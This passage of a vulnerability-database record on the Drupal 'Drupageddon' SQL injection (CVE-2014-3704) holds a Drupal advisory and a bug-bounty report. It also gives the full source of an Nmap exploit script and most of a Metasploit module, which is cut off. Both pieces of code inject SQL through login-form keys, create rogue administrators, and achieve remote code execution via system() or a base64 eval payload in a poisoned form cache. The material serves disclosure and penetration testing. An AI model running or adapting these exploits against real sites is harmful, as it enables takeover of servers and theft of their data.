"CVE-2014-2983", "CVE-2014-3704", "CVE-2015-2781", "CVE-2014-9253", "CVE-2015-2842", "CVE-2014-8089", "CVE-2015-2690", "CVE-2015-2932", "CVE-2015-2937", "CVE-2014-5019", "CVE-2015-1773", "CVE-2015-2559", "CVE-2014-5022", "CVE-2015-2931", "CVE-2014-2684", "CVE-2014-4914", "CVE-2014-5362", "CVE-2014-5032", "CVE-2015-2936", "CVE-2015-2935", "CVE-2014-2683", "CVE-2014-2681", "CVE-2015-2560"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:VULN:14479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14479", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "drupal": [{"lastseen": "2021-01-03T21:52:23", "bulletinFamily": "software", "cvelist": ["CVE-2014-3704"], "description": "Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.\n\nA vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.\n\nThis vulnerability can be exploited by anonymous users.\n\n**Update:** Multiple exploits have been reported in the wild following the release of this security advisory, and Drupal 7 sites which did not update soon after the advisory was released may be compromised. See this follow-up announcement for more information: <https://www.drupal.org/PSA-2014-003>\n\n## CVE identifier(s) issued\n\n * CVE-2014-3704\n\n## Versions affected\n\n * Drupal core 7.x versions prior to 7.32.\n\n## Solution\n\nInstall the latest version:\n\n * If you use Drupal 7.x, upgrade to [Drupal core 7.32](<https://www.drupal.org/drupal-7.32-release-notes>).\n\nIf you are unable to update to Drupal 7.32 you can apply [this patch](<https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch>) to Drupal's database.inc file to fix the vulnerability until such time as you are able to completely upgrade to Drupal 7.32.\n\nAlso see the [Drupal core](<https://www.drupal.org/project/drupal>) project page and the [follow-up public service announcement](<https://www.drupal.org/PSA-2014-003>).\n\n## Reported by\n\n * Stefan Horst\n\n## Fixed by\n\n * Stefan Horst\n * [Greg Knaddison](<https://www.drupal.org/u/greggles>) of the Drupal Security Team\n * [Lee Rowlands](<https://www.drupal.org/u/larowlan>) of the Drupal Security Team\n * [David Rothstein](<https://www.drupal.org/u/david_rothstein>) of the Drupal Security Team\n * [Klaus Purer](<https://www.drupal.org/u/klausi>) of the Drupal Security Team\n\n## Coordinated by\n\n * [The Drupal Security Team](<https://www.drupal.org/security-team>)\n", "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "DRUPAL-SA-CORE-2014-005", "href": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql", "type": "drupal", "title": "SA-CORE-2014-005 - Drupal core - SQL injection\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nmap": [{"lastseen": "2019-05-30T17:05:44", "description": "Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions &lt; 7.32 of Drupal core are known to be affected. \n\nVulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. \n\nThe script injects new Drupal administrator user via login form and then it attempts to log in as this user to determine if target is vulnerable. If that's the case following exploitation steps are performed: \n\n * PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled, \n * permission to use PHP code for administrator users is set, \n * new article which contains payload is created &amp; previewed, \n * cleanup: by default all DB records that were added/modified by the script are restored. \n\nVulnerability originally discovered by Stefan Horst from SektionEins. \n\nExploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.\n\n### See also:\n\n * http-sql-injection.nse \n\n## Script Arguments \n\n#### http-vuln-cve2014-3704.uri \n\nDrupal root directory on the website. Default: /\n\n#### http-vuln-cve2014-3704.cmd \n\nShell command to execute. Default: nil\n\n#### http-vuln-cve2014-3704.cleanup \n\nIndicates whether cleanup (removing DB records that was added/modified during exploitation phase) will be done. Default: true\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd=\"uname -a\",http-vuln-cve2014-3704.uri=\"/drupal\" <target>\n nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri=\"/drupal\",http-vuln-cve2014-3704.cleanup=false <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2014-3704:\n | VULNERABLE:\n | Drupal - pre Auth SQL Injection Vulnerability\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:CVE-2014-3704\n | The expandArguments function in the database abstraction API in\n | Drupal core 7.x before 7.32 does not properly construct prepared\n | statements, which allows remote attackers to conduct SQL injection\n | attacks via an array containing crafted keys.\n |\n | Disclosure date: 2014-10-15\n | Exploit results:\n | Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux\n | References:\n | https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\n | https://www.drupal.org/SA-CORE-2014-005\n | http://www.securityfocus.com/bid/70595\n |_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * table\n * url\n * vulns\n * openssl\n * rand\n\n* * *\n", "edition": 11, "published": "2015-12-14T21:29:30", "title": "http-vuln-cve2014-3704 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2018-09-08T17:07:06", "id": "NMAP:HTTP-VULN-CVE2014-3704.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2014-3704.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal url = require \"url\"\nlocal vulns = require \"vulns\"\nlocal openssl = require \"openssl\"\nlocal rand = require \"rand\"\n\ndescription = [[\nExploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32\nof Drupal core are known to be affected.\n\nVulnerability allows remote attackers to conduct SQL injection attacks via an\narray containing crafted keys.\n\nThe script injects new Drupal administrator user via login form and then it\nattempts to log in as this user to determine if target is vulnerable. If that's\nthe case following exploitation steps are performed:\n\n* PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,\n* permission to use PHP code for administrator users is set,\n* new article which contains payload is created & previewed,\n* cleanup: by default all DB records that were added/modified by the script are restored.\n\nVulnerability originally discovered by Stefan Horst from SektionEins.\n\nExploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.\n]]\n\n---\n-- @see http-sql-injection.nse\n--\n-- @usage\n-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd=\"uname -a\",http-vuln-cve2014-3704.uri=\"/drupal\" <target>\n-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri=\"/drupal\",http-vuln-cve2014-3704.cleanup=false <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2014-3704:\n-- | VULNERABLE:\n-- | Drupal - pre Auth SQL Injection Vulnerability\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:CVE-2014-3704\n-- | The expandArguments function in the database abstraction API in\n-- | Drupal core 7.x before 7.32 does not properly construct prepared\n-- | statements, which allows remote attackers to conduct SQL injection\n-- | attacks via an array containing crafted keys.\n-- |\n-- | Disclosure date: 2014-10-15\n-- | Exploit results:\n-- | Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux\n-- | References:\n-- | https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\n-- | https://www.drupal.org/SA-CORE-2014-005\n-- | http://www.securityfocus.com/bid/70595\n-- |_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704\n--\n-- @args http-vuln-cve2014-3704.uri Drupal root directory on the website. Default: /\n-- @args http-vuln-cve2014-3704.cmd Shell command to execute. Default: nil\n-- @args http-vuln-cve2014-3704.cleanup Indicates whether cleanup (removing DB\n-- records that was added/modified during\n-- exploitation phase) will be done.\n-- Default: true\n---\n\nauthor = \"Mariusz Ziulek <mzet()owasp org>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"intrusive\", \"exploit\"}\n\nportrule = shortport.http\n\n--- Appends a new multipart/form-data part to a table\nlocal function multipart_append_data(r, k, data, extra)\n r[#r + 1] = string.format(\"content-disposition: form-data; name=\\\"%s\\\"\", k)\n if extra.filename then\n r[#r + 1] = string.format(\"; filename=\\\"%s\\\"\", extra.filename)\n end\n if extra.content_type then\n r[#r + 1] = string.format(\"\\r\\ncontent-type: %s\", extra.content_type)\n end\n if extra.content_transfer_encoding then\n r[#r + 1] = string.format(\"\\r\\ncontent-transfer-encoding: %s\", extra.content_transfer_encoding)\n end\n r[#r + 1] = string.format(\"\\r\\n\\r\\n%s\\r\\n\", data)\nend\n\n--- Creates multipart/form-data message as defined in RFC 2388\nlocal function multipart_build_body(content, boundary)\n local r = {}\n local k, v\n for k, v in pairs(content) do\n r[#r + 1] = string.format(\"--%s\\r\\n\", boundary)\n if type(v) == \"string\" then\n multipart_append_data(r, k, v, {})\n elseif type(v) == \"table\" then\n if v.data == nil then return nil end\n local extra = {\n filename = v.filename or v.name,\n content_type = v.content_type or v.mimetype or \"application/octet-stream\",\n content_transfer_encoding = v.content_transfer_encoding or \"binary\",\n }\n multipart_append_data(r, k, v.data, extra)\n else\n return nil\n end\n end\n\n r[#r + 1] = string.format(\"--%s--\\r\\n\", boundary)\n return table.concat(r)\nend\n\nlocal function extract_CSRFtoken(content)\n local pattern = 'name=\"form_token\" value=\"(.-)\"'\n local value = string.match(content, pattern)\n return value\nend\n\nlocal function itoa64(index)\n local itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n return string.sub(itoa64, index + 1, index + 1)\nend\n\nlocal function phpass_encode64(input)\n local count = #input + 1\n local out = {}\n local cur = 1\n\n while cur < count do\n local value = string.byte(input, cur)\n cur = cur + 1\n table.insert(out, itoa64(value & 0x3f))\n\n if cur < count then\n value = value | (string.byte(input, cur) << 8)\n end\n table.insert(out, itoa64((value >> 6) & 0x3f))\n\n if cur >= count then\n break\n end\n cur = cur + 1\n\n if cur < count then\n value = value | (string.byte(input, cur) << 16)\n end\n table.insert(out, itoa64((value >> 12) & 0x3f))\n\n if cur >= count then\n break\n end\n cur = cur + 1\n\n table.insert(out, itoa64((value >> 18) & 0x3f))\n end\n\n return table.concat(out)\nend\n\nlocal function gen_passwd_hash(passwd)\n local iter = 15\n local iter_char = itoa64(iter)\n local iter_count = 1<<iter\n local salt = rand.random_alpha(8)\n\n local md5 = openssl.md5(salt .. passwd)\n for i = 1, iter_count do\n md5 = openssl.md5(md5 .. passwd)\n end\n\n local dgst = phpass_encode64(md5)\n local h = '$P$' .. iter_char .. salt .. string.sub(dgst, 0, 22)\n return h\nend\n\nlocal function do_sql_query(host, port, uri, user)\n\n local adminRole = 'administrator'\n local sql_user\n local sql_admin\n local passwd\n local email\n local passHash\n local query\n\n if user == nil then\n user = rand.random_alpha(10)\n passwd = rand.random_alpha(10)\n passHash = gen_passwd_hash(passwd)\n email = rand.random_alpha(8) .. '@' .. rand.random_alpha(5) .. '.' .. rand.random_alpha(3)\n\n stdnse.debug(1, string.format(\"adding admin user (username: '%s'; passwd: '%s')\", user, passwd))\n sql_user = url.escape(\"insert into users (uid,name,pass,mail,status) select max(uid)+1,'\" .. user .. \"','\" .. passHash .. \"','\" .. email .. \"',1 from users;\")\n\n sql_admin = url.escape(\"insert into users_roles (uid, rid) VALUES ((select uid from users where name='\" .. user .. \"'), (select rid from role where name = '\" .. adminRole .. \"'));\")\n\n query = sql_user .. sql_admin\n else\n stdnse.debug(1, string.format(\"removing admin user (username: '%s')\", user))\n\n sql_user = url.escape(\"delete from users where name='\" .. user .. \"';\")\n\n sql_admin = url.escape(\"delete from users_roles where uid=(select uid from users where name='\" .. user .. \"');\")\n\n query = sql_admin .. sql_user\n end\n\n local r = \"name[0;\" .. query .. \"#%20%20]=\" .. rand.random_alpha(10) .. \"&name[0]=\" .. rand.random_alpha(10) .. \"&pass=\" .. rand.random_alpha(10) .. \"&form_id=user_login&op=Log+in\"\n\n local opt = {\n header = {\n ['Content-Type'] = \"application/x-www-form-urlencoded\"\n }\n }\n local res = http.post(host, port, uri .. \"?q=/user/login\", opt, nil, r)\n\n if string.match(res.body, \"includes[\\\\/]database[\\\\/]database%.inc\") and string.match(res.body, \"addcslashes%(%)\") then\n return user, passwd\n end\n\nend\n\nlocal function set_php_filter(host, port, uri, session, disable)\n\n -- enable PHP filter\n if not disable then\n stdnse.debug(1, \"enabling PHP filter module\")\n else\n stdnse.debug(1, \"disabling PHP filter module\")\n end\n\n local opt = {}\n opt['cookies'] = session.name ..'='.. session.value\n\n local res = http.get(host, port, uri .. \"?q=/admin/modules\", opt)\n if res == nil then return nil end\n\n local csrfToken = extract_CSRFtoken(res.body)\n\n local enabledModulesPattern = 'name=\"([^\"]*)\" value=\"1\" checked=\"checked\" class=\"form%-checkbox\"'\n local data = {}\n for m in string.gmatch(res.body, enabledModulesPattern) do\n data[m] = 1\n if disable and m == 'modules[Core][php][enable]' then\n data[m] = nil\n end\n end\n\n if not disable then\n data['modules[Core][php][enable]'] = 1\n end\n data['form_token'] = csrfToken\n data['form_id'] = 'system_modules'\n data['op'] = 'Save configuration'\n res = http.post(host, port, uri .. \"?q=/admin/modules/list/confirm\", opt, nil, data)\n if res == nil then return nil end\n\n return true\nend\n\nlocal function set_permission(host, port, uri, session, disable)\n\n -- allow Administrator to use php_code\n if not disable then\n stdnse.debug(1, \"setting permissions for PHP filter module\")\n else\n stdnse.debug(1, \"restoring permissions for PHP filter module\")\n end\n\n local opt = {}\n opt['cookies'] = session.name ..'='.. session.value\n\n local res = http.get(host, port, uri .. \"?q=/admin/people/permissions\", opt)\n if res == nil then return nil end\n\n local csrfToken = extract_CSRFtoken(res.body)\n\n local enabledPermsRegex = 'name=\"([^\"]*)\" value=\"([^\"]*)\" checked=\"checked\"'\n local data = {}\n for key, value in string.gmatch(res.body, enabledPermsRegex) do\n data[key] = value\n if disable and key == '3[use text format php_code]' then\n data[key] = nil\n end\n end\n\n if not disable then\n data['3[use text format php_code]'] = 'use text format php_code'\n end\n data['form_token'] = csrfToken\n data['form_id'] = 'user_admin_permissions'\n data['op'] = 'Save permissions'\n res = http.post(host, port, uri .. \"?q=/admin/people/permissions\", opt, nil, data)\n if res == nil then return nil end\n\n return true\nend\n\nlocal function trigger_exploit(host, port, uri, session, cmd)\n\n local opt = {}\n opt['cookies'] = session.name ..'='.. session.value\n\n -- add new Content page & trigger RCE\n stdnse.debug(1, string.format(\"%s\", \"creating new article page with planted payload\"))\n\n local res = http.get(host, port, uri .. \"?q=/node/add/article\", opt)\n if res == nil then return nil end\n\n local csrfToken = extract_CSRFtoken(res.body)\n\n stdnse.debug(1, string.format(\"%s\", \"calling preview article page & triggering exploit\"))\n local pattern = '\"' .. rand.random_alpha(5)\n local payload = \"<?php echo '\" .. pattern .. \" '; system('\" .. cmd .. \"'); echo '\".. pattern .. \" '; ?>\"\n local boundary = rand.random_alpha(16)\n opt['header'] = {}\n opt['header'][\"Content-Type\"] = \"multipart/form-data\" .. \"; boundary=\" .. boundary\n\n local files = {\n ['title'] = 'title',\n ['form_id'] = 'article_node_form',\n ['form_token'] = csrfToken,\n ['body[und][0][value]'] = payload,\n ['body[und][0][format]'] = 'php_code',\n ['op'] = 'Preview',\n }\n local body = multipart_build_body(files, boundary)\n\n res = http.post(host, port, uri .. \"?q=/node/add/article\", opt, nil, body)\n if res == nil then return nil end\n\n return res.body, pattern\nend\n\naction = function(host, port)\n\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or '/'\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or nil\n local cleanup = nil\n if stdnse.get_script_args(SCRIPT_NAME..\".cleanup\") == \"false\" then\n cleanup = \"false\"\n end\n\n local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)\n local vuln = {\n title = 'Drupal - pre Auth SQL Injection Vulnerability',\n state = vulns.STATE.NOT_VULN,\n description = [[\n The expandArguments function in the database abstraction API in\n Drupal core 7.x before 7.32 does not properly construct prepared\n statements, which allows remote attackers to conduct SQL injection\n attacks via an array containing crafted keys.\n ]],\n IDS = {CVE = 'CVE-2014-3704'},\n references = {\n 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',\n 'https://www.drupal.org/SA-CORE-2014-005',\n 'http://www.securityfocus.com/bid/70595',\n },\n dates = {\n disclosure = {year = '2014', month = '10', day = '15'},\n },\n }\n\n local user, passwd = do_sql_query(host, port, uri, nil)\n\n if user == nil or passwd == nil then\n return vulnReport:make_output(vuln)\n end\n\n stdnse.debug(1, string.format(\"logging in as admin user (username: '%s'; passwd: '%s')\", user, passwd))\n\n vuln.state = vulns.STATE.EXPLOIT\n\n local data = {\n ['name'] = user,\n ['pass'] = passwd,\n ['form_id'] = 'user_login',\n ['op'] = 'Log in',\n }\n\n local res = http.post(host, port, uri .. \"?q=/user/login\", nil, nil, data)\n\n if res.status == 302 and res.cookies[1].name ~= nil then\n\n stdnse.debug(1, string.format(\"logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.\", user, passwd))\n\n if cmd ~= nil then\n local session = {}\n session.name = res.cookies[1].name\n session.value = res.cookies[1].value\n\n set_php_filter(host, port, uri, session, false)\n\n set_permission(host, port, uri, session, false)\n\n local resp_content, pattern = trigger_exploit(host, port, uri, session, cmd)\n\n local cmdOut = nil\n for m in string.gmatch(resp_content, pattern .. '([^\"]*)' .. pattern) do\n cmdOut = m\n break\n end\n\n if cmdOut ~= nil then\n vuln.exploit_results = cmdOut\n end\n\n -- cleanup: restore permission & disable php filter module\n if cleanup == nil then\n set_permission(host, port, uri, session, true)\n set_php_filter(host, port, uri, session, true)\n end\n end\n\n else\n vuln.state = vulns.STATE.LIKELY_VULN\n vuln.check_results = \"Account created but unable to log in.\"\n end\n\n -- cleanup: remove admin user\n if cleanup == nil then\n do_sql_query(host, port, uri, user)\n end\n\n return vulnReport:make_output(vuln)\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:09", "bulletinFamily": "bugbounty", "bounty": 3000.0, "cvelist": ["CVE-2014-3704"], "description": "# Motivation\r\nI found a SQL Injection bug in Drupal < 7.32. Which can lead to a code execution. \r\n\r\nYou need not have any user or knowledge of the targeted site.\r\n\r\nSince Drupal is used as they state by \"millions of websites and applications\" I thought about applying for this bug bounty.\r\n\r\n# The Bug\r\nDrupal uses Prepared Statements to secure the SQL Querys from Injections. To handle IN statements they created a expandArguments function, which uses the Array keys to create names for the placeholders. \r\n\r\n foreach ($data as $i => $value) {\r\n [...]\r\n $new_keys[$key . '_' . $i] = $value;\r\n }\r\n\r\nThe function assumes that it is called with an array which has no keys. Example:\r\n\r\n db_query(\"SELECT * FROM {users} where name IN (:name)\", array(':name'=>array('user1','user2')));\r\n\r\nWhich results in this SQL Statement\r\n\r\n SELECT * from users where name IN (:name_0, :name_1)\r\n\r\nwith the parameters name_0 = user1 and name_1 = user2.\r\n\r\nThe Problem occurs, if the array has keys, which are no integers. Example:\r\n\r\n db_query(\"SELECT * FROM {users} where name IN (:name)\", array(':name'=>array('test) -- ' => 'user1','test' => 'user2')));\r\n\r\nthis results in an exploitable SQL query:\r\n\r\n SELECT * FROM users WHERE name IN (:name_test) -- , :name_test )\r\n\r\nwith parameters :name_test = user2.\r\n\r\nSince Drupal uses PDO, multi-queries are allowed. So this SQL Injection can be used to insert arbitrary data in the database, dump or modify existing data or drop the whole database.\r\n\r\nWith the possibility to INSERT arbitrary data into the database an attacker can execute any PHP code through a manipulated Session and Drupal features with callbacks.\r\n\r\n# Advisory\r\nhttps://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\r\n\r\n# CVE Information\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-3704 to this vulnerability.\r\n\r\n# Poc\r\nI included two PoCs. The first creates one request to create a session which has Admin privileges (UserID 1). The second executes code with only one request and destroys the session afterwards to not create a new Database entry. Some parts of the Second PoC were discovered with help of my coworker Stefan Esser.", "modified": "2015-04-06T09:40:09", "published": "2014-10-17T10:50:36", "id": "H1:31756", "href": "https://hackerone.com/reports/31756", "type": "hackerone", "title": "The Internet: Drupal 7 pre auth sql injection and remote code execution", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2020-10-07T23:18:37", "description": "This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). Two methods are available to trigger the PHP payload on the target: \\- set TARGET 0: Form-cache PHP injection method (default). This uses the SQLi to upload a malicious form to Drupal's cache, then trigger the cache entry to execute the payload using a POP chain. \\- set TARGET 1: User-post injection method. This creates a new Drupal user, adds it to the administrators group, enable Drupal's PHP module, grant the administrators the right to bundle PHP code in their post, create a new post containing the payload and preview it to trigger the payload execution.\n", "published": "2014-10-16T17:32:39", "type": "metasploit", "title": "Drupal HTTP Parameter Key/Value SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/DRUPAL_DRUPAGEDDON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupal HTTP Parameter Key/Value SQL Injection',\n 'Description' => %q{\n This module exploits the Drupal HTTP Parameter Key/Value SQL Injection\n (aka Drupageddon) in order to achieve a remote shell on the vulnerable\n instance. This module was tested against Drupal 7.0 and 7.31 (was fixed\n in 7.32).\n\n Two methods are available to trigger the PHP payload on the target:\n\n - set TARGET 0:\n Form-cache PHP injection method (default).\n This uses the SQLi to upload a malicious form to Drupal's cache,\n then trigger the cache entry to execute the payload using a POP chain.\n\n - set TARGET 1:\n User-post injection method.\n This creates a new Drupal user, adds it to the administrators group,\n enable Drupal's PHP module, grant the administrators the right to\n bundle PHP code in their post, create a new post containing the\n payload and preview it to trigger the payload execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SektionEins', # discovery\n 'WhiteWinterWolf', # form-cache PHP injection method\n 'Christian Mehlmauer', # user-post PHP injection method\n 'Brandon Perry' # user-post PHP injection method\n ],\n 'References' =>\n [\n ['CVE', '2014-3704'],\n ['URL', 'https://www.drupal.org/SA-CORE-2014-005'],\n ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'],\n ['URL', 'https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/']\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Drupal 7.0 - 7.31 (form-cache PHP injection method)', {}],\n ['Drupal 7.0 - 7.31 (user-post PHP injection method)', {}]\n ],\n 'Notes' => {'AKA' => ['Drupageddon']},\n 'DisclosureDate' => '2014-10-15',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/'])\n ])\n\n register_advanced_options(\n [\n OptInt.new('Wait', [true, \"Number of seconds to wait before triggering the payload sent (form-cache method only).\", 5]),\n OptString.new('ADMIN_ROLE', [ true, \"The administrator role (user-post method only)\", 'administrator']),\n OptInt.new('Iter', [ true, \"Hash iterations (2^ITER, user-post method only))\", 10])\n ])\n end\n\n ##\n # Form-cache PHP injection method\n ##\n\n def sql_insert(id, value)\n curlyopen = rand_text_alphanumeric(8)\n curlyclose = rand_text_alphanumeric(8)\n value.gsub!('{', curlyopen)\n value.gsub!('}', curlyclose)\n\n \"INSERT INTO {cache_form} (cid, data, expire, created, serialized) \" \\\n + \"VALUES ('#{id}', REPLACE(REPLACE('#{value}', '#{curlyopen}', \" \\\n + \"CHAR(#{'{'.ord})), '#{curlyclose}', CHAR(#{'}'.ord})), -1, 0, 1);\"\n end\n\n def exploit_formcache\n form_build_id = 'form-' + rand_text_alphanumeric(43)\n\n # Remove the malicious cache entries upon success.\n evalstr = \"cache_clear_all(array('form_\" + form_build_id + \"', \" \\\n + \"'form_state_\" + form_build_id + \"'), 'cache_form');\"\n evalstr << payload.encoded\n evalstr = Rex::Text.encode_base64(evalstr)\n # '<?php' tag required by php_eval().\n evalstr = \"<?php eval(base64_decode(\\\\'#{evalstr}\\\\'));\"\n # Don't count the backslashes.\n evalstr_len = evalstr.length - 2\n\n # Serialized malicious form state.\n # The PHP module may be disabled (and should be).\n # Load its definition manually to get access to php_eval().\n state = 'a:1:{s:10:\"build_info\";a:1:{s:5:\"files\";a:1:{'\n state << 'i:0;s:22:\"modules/php/php.module\";'\n state << '}}}'\n # Initiates a POP chain in includes/form.inc:1850, form_builder()\n form = 'a:6:{'\n form << 's:5:\"#type\";s:4:\"form\";'\n form << 's:8:\"#parents\";a:1:{i:0;s:4:\"user\";}'\n form << 's:8:\"#process\";a:1:{i:0;s:13:\"drupal_render\";}'\n form << 's:16:\"#defaults_loaded\";b:1;'\n form << 's:12:\"#post_render\";a:1:{i:0;s:8:\"php_eval\";}'\n form << 's:9:\"#children\";s:' + evalstr_len.to_s + ':\"' + evalstr + '\";'\n form << '}'\n\n # SQL injection key lines:\n # - modules/user/user.module:2149, user_login_authenticate_validate()\n # - includes/database/database.inc:745, expandArguments()\n sql = sql_insert('form_state_' + form_build_id, state)\n sql << sql_insert('form_' + form_build_id, form)\n # Causes PHP script to timeout, avoiding payload logging.\n sql << 'SELECT SLEEP(666);'\n\n # Use the login form to inject the malicious cache entry.\n # '!' follows redirects, used by some Drupal sites to enforce clean URLs.\n # Don't check the return code as it *will* timeout.\n send_request_cgi!({\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'vars_post' => {\n # Don't use 'user_login_block' as it may be disabled.\n 'form_id' => 'user_login',\n 'form_build_id' => '',\n \"name[0;#{sql}#]\" => '',\n # This field must be located *after* the injection.\n \"name[0]\" => '',\n 'op' => 'Log in',\n 'pass' => Rex::Text.rand_text_alpha(8)\n },\n 'vars_get' => {\n 'q' => 'user/login'\n }\n }, timeout=datastore['Wait'])\n\n # Trigger the malicious cache entry using its form ID.\n send_request_cgi!({\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'vars_post' => {\n 'form_id' => 'user_login',\n \"form_build_id\" => form_build_id,\n \"name\" => Rex::Text.rand_text_alpha(10),\n 'op' => 'Log in',\n 'pass' => Rex::Text.rand_text_alpha(10)\n },\n 'vars_get' => {\n 'q' => 'user/login'\n }\n })\n end\n\n ##\n # User-post PHP injection method\n ##\n\n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def admin_role\n datastore['ADMIN_ROLE']\n end\n\n def iter\n datastore['Iter']\n end\n\n def itoa64\n './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n end\n\n # PHPs PHPASS base64 method\n def phpass_encode64(input, count)\n out = ''\n cur = 0\n while cur < count\n value = input[cur].ord\n cur += 1\n out << itoa64[value & 0x3f]\n if cur < count\n value |= input[cur].ord << 8\n end\n out << itoa64[(value >> 6) & 0x3f]\n break if cur >= count\n cur += 1\n\n if cur < count\n value |= input[cur].ord << 16\n end\n out << itoa64[(value >> 12) & 0x3f]\n break if cur >= count\n cur += 1\n out << itoa64[(value >> 18) & 0x3f]\n end\n out\n end\n\n def generate_password_hash(pass)\n # Syntax for MD5:\n # $P$ = MD5\n # one char representing the hash iterations (min 7)\n # 8 chars salt\n # MD5_raw(salt.pass) + iterations\n # MD5 phpass base64 encoded (!= encode_base64) and trimmed to 22 chars for md5\n iter_char = itoa64[iter]\n salt = Rex::Text.rand_text_alpha(8)\n md5 = Rex::Text.md5_raw(\"#{salt}#{pass}\")\n # convert iter from log2 to integer\n iter_count = 2**iter\n 1.upto(iter_count) {\n md5 = Rex::Text.md5_raw(\"#{md5}#{pass}\")\n }\n md5_base64 = phpass_encode64(md5, md5.length)\n md5_stripped = md5_base64[0...22]\n pass = \"$P\\\\$\" + iter_char + salt + md5_stripped\n vprint_status(\"password hash: #{pass}\")\n\n return pass\n end\n\n def 